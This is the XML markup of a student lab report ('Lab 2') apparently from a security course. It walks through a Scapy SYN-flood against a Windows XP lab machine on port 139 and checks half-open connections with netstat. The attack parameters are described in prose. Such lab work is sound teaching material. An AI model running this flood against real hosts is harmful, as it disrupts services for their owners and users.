        <w:t xml:space="preserve"> The destination IP address for the machine is given as the IP address of the XP machine </w:t>
      </w:r>
      <w:r w:rsidR="00542B8B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>“10.10.111.110</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> Random numbers are used for </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ID (Identity) and TTL (Time to Live) fields.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00542B8B">
        <w:t>In order to</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> to generate a flood of packets we use </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RandShort as the sport (Source Port).</w:t>
      </w:r>
      <w:r w:rsidR="003A6FAA">
        <w:t xml:space="preserve"> This will</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> generate random port numbers for the source port of the TCP Packet. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dport (Destination Port) is specified to be 139.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>TCP Connect flag is set</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> to sync using the flags option </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>flags=”S”.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> The</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> srloop function</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> would send the packets in an </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>interval of 0.</w:t>
      </w:r>
      <w:r w:rsidR="00542B8B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> seconds. The</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> timeout for the packet is set as 6 seconds</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>retry value is set as 4 seconds.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> The output for this packet would be collected in </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ans (for answered packets) and unans (for unanswered packets).</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> Now, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SYN/ACK would be received from Windows XP machine due to the flooding of sync packets, but because of the IPTABLES rule, BT5 machine doesn’t send the ACK packets to the SYN/ACK packets. This packets can be traced in BT5 as unanswered packets, hence we use the command of unans.summary()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324ADD75" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="7D1E97C9" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23"/>
    <w:p w14:paraId="19B1E266" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C08006F" wp14:editId="4A0576FE">
            <wp:extent cx="5932805" cy="3710940"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="36" name="Picture 36" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.17.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sers/Home/Desktop/Screen Shot 2016-02-28 at 9.17.23 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58471794" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="3A606F45" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRPr="00C35F08" w:rsidRDefault="00542B8B" w:rsidP="00C35F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidR="00C35F08" w:rsidRPr="00C35F08">
        <w:t xml:space="preserve">ommand </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>python flood</w:t>
      </w:r>
      <w:r w:rsidR="00C35F08" w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.py</w:t>
      </w:r>
      <w:r w:rsidR="00C35F08" w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">will </w:t>
      </w:r>
      <w:r w:rsidR="00C35F08" w:rsidRPr="00C35F08">
        <w:t>start sending the sync packets to the Windows XP Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20997020" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="396F4F19" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00C35F08">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4EB2D1DA" wp14:editId="3D298165">
            <wp:extent cx="5932805" cy="2402840"/>
            <wp:effectExtent l="0" t="0" r="10795" b="10160"/>
            <wp:docPr id="34" name="Picture 34" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.12.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sers/Home/Desktop/Screen Shot 2016-02-28 at 9.12.37 P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2805" cy="2402840"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3A32E4" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="19BF599B" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRPr="00C35F08" w:rsidRDefault="00C35F08" w:rsidP="00C35F08">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="00542B8B">
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve">Windows XP Machine command prompt and check the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SYN_RECEIVED packets by executing netstat –a.</w:t>
      </w:r>
      <w:r w:rsidRPr="00C35F08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD3DB0" w14:textId="77777777" w:rsidR="00C35F08" w:rsidRDefault="00C35F08"/>
    <w:p w14:paraId="2E94737D" w14:textId="77777777" w:rsidR="00A03D23" w:rsidRDefault="00A03D23">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C55DA6D" wp14:editId="04A98688">
            <wp:extent cx="5932805" cy="3710940"/>
            <wp:effectExtent l="0" t="0" r="10795" b="0"/>
            <wp:docPr id="37" name="Picture 37" descr="/Users/Home/Desktop/Screen Shot 2016-02-28 at 9.16.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sers/Home/Desktop/Screen Shot 2016-02-28 at 9.16.16 P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7058515B" w14:textId="77777777" w:rsidR="00550447" w:rsidRDefault="00550447"/>
    <w:p w14:paraId="0735FF2E" w14:textId="77777777" w:rsidR="00550447" w:rsidRDefault="00550447"/>
    <w:p w14:paraId="41BE13CF" w14:textId="7D88B0B6" w:rsidR="00550447" w:rsidRDefault="00550447" w:rsidP="00550447">
      <w:r>
        <w:t>Reference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DE1C05" w14:textId="77777777" w:rsidR="00550447" w:rsidRDefault="00550447" w:rsidP="00550447"/>
    <w:p w14:paraId="1B2B5CC9" w14:textId="77777777" w:rsidR="00550447" w:rsidRPr="00550447" w:rsidRDefault="00433A33" w:rsidP="00550447">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidR="00550447" w:rsidRPr="00550447">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:color w:val="00B0F0"/>
          </w:rPr>
          <w:t>http://en.wikipedia.org/wiki/Metasploit_Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5DE20346" w14:textId="77777777" w:rsidR="00550447" w:rsidRPr="00550447" w:rsidRDefault="00433A33" w:rsidP="00550447">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="00B0F0"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId36" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00550447" w:rsidRPr="00550447">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="00B0F0"/>
          </w:rPr>
          <w:t>http://www.secdev.org/projects/scapy/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4EEEA42B" w14:textId="77777777" w:rsidR="00550447" w:rsidRDefault="00433A33" w:rsidP="00550447">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:hyperlink r:id="rId37" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="00550447" w:rsidRPr="00550447">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="00B0F0"/>
          </w:rPr>
          <w:t>http://www.secdev.org/projects/scapy/doc/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="71093510" w14:textId="341CD6B2" w:rsidR="00550447" w:rsidRPr="00550447" w:rsidRDefault="00550447" w:rsidP="00550447">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:rPr>
          <w:color w:val="00B0F0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00550447">
        <w:rPr>
          <w:color w:val="00B0F0"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>http://www.offensive-security.com/metasploit-unleashed/Persistent_Meterpreter_Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E146F92" w14:textId="77777777" w:rsidR="00550447" w:rsidRPr="00550447" w:rsidRDefault="00550447" w:rsidP="00550447">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76352169" w14:textId="77777777" w:rsidR="00550447" w:rsidRDefault="00550447" w:rsidP="00550447">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A46E6B" w14:textId="77777777" w:rsidR="00550447" w:rsidRDefault="00550447" w:rsidP="00550447">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C162855" w14:textId="77777777" w:rsidR="00550447" w:rsidRPr="00550447" w:rsidRDefault="00550447" w:rsidP="00550447"/>
    <w:p w14:paraId="1E02ED97" w14:textId="77777777" w:rsidR="00550447" w:rsidRDefault="00550447"/>
    <w:sectPr w:rsidR="00550447" w:rsidSect="001C34C9">
      <w:headerReference w:type="even" r:id="rId38"/>
      <w:headerReference w:type="default" r:id="rId39"/>
      <w:footerReference w:type="even" r:id="rId40"/>
      <w:footerReference w:type="default" r:id="rId41"/>
      <w:headerReference w:type="first" r:id="rId42"/>
      <w:footerReference w:type="firs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526042" w14:textId="77777777" w:rsidR="00433A33" w:rsidRDefault="00433A33" w:rsidP="003A6FAA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5323B46A" w14:textId="77777777" w:rsidR="00433A33" w:rsidRDefault="00433A33" w:rsidP="003A6F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EA0682" w14:textId="77777777" w:rsidR="00C02BB3" w:rsidRDefault="00C02BB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4E8F3B" w14:textId="77777777" w:rsidR="00C02BB3" w:rsidRDefault="00C02BB3">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8E76D4" w14:textId="77777777" w:rsidR="00C02BB3" w:rsidRDefault="00C02BB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99045D" w14:textId="77777777" w:rsidR="00433A33" w:rsidRDefault="00433A33" w:rsidP="003A6FAA">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0C4A3D48" w14:textId="77777777" w:rsidR="00433A33" w:rsidRDefault="00433A33" w:rsidP="003A6FA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ADC1F1" w14:textId="77777777" w:rsidR="00C02BB3" w:rsidRDefault="00C02BB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47A97F" w14:textId="4C6C7AFE" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="003A6FAA">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:t>L</w:t>
    </w:r>
    <w:r w:rsidR="00C02BB3">
      <w:t>ab 2</w:t>
    </w:r>
    <w:bookmarkStart w:id="0" w:name="_GoBack"/>
    <w:bookmarkEnd w:id="0"/>
  </w:p>
  <w:p w14:paraId="192D4DE5" w14:textId="313B7C77" w:rsidR="003A6FAA" w:rsidRDefault="003A6FAA" w:rsidP="003A6FAA">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:jc w:val="right"/>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F02991" w14:textId="77777777" w:rsidR="00C02BB3" w:rsidRDefault="00C02BB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135C93"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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98811E1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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089258E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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A7C5A35"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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1B57853"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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4AC433B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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7956A3D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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CA5742"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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C172152"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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E843D12"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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3E87FE7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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6953180"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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F74779B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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70A0852"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2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D352646"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B2A2E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
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="2"/>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57EA"/>
    <w:rsid w:val="001C34C9"/>
    <w:rsid w:val="002E7976"/>
    <w:rsid w:val="003A6FAA"/>
    <w:rsid w:val="00404912"/>
    <w:rsid w:val="00433A33"/>
    <w:rsid w:val="00542B8B"/>
    <w:rsid w:val="00550447"/>
    <w:rsid w:val="005E7A54"/>
    <w:rsid w:val="006B346B"/>
    <w:rsid w:val="009053A1"/>
    <w:rsid w:val="00A03D23"/>
    <w:rsid w:val="00A81806"/>
    <w:rsid w:val="00C02BB3"/>
    <w:rsid w:val="00C35F08"/>
    <w:rsid w:val="00C56324"/>
    <w:rsid w:val="00C97FE2"/>
    <w:rsid w:val="00E557EA"/>
    <w:rsid w:val="00EE4EB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49C1CA2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03D23"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A03D23"/>
    <w:pPr>
      <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C97FE2"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A6FAA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003A6FAA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A6FAA"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003A6FAA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00550447"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="005504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6973138">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="20478690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hyperlink" Target="http://en.wikipedia.org/wiki/Intrusion-detection_system" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Computer_security" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Vulnerability_(computer_science)" TargetMode="Externa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hyperlink" Target="http://en.wikipedia.org/wiki/Metasploit_Project" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.secdev.org/projects/scapy/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Open_source" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Exploit_(computer_security)"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hyperlink" Target="http://www.secdev.org/projects/scapy/doc/" TargetMode="External"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><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header" Target="header3.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.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15</Pages>
  <Words>1043</Words>
  <Characters>5949</Characters>
  <Application>Microsoft Macintosh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Thakker</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Pratik Thakker</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-02-29T03:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-24T02:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>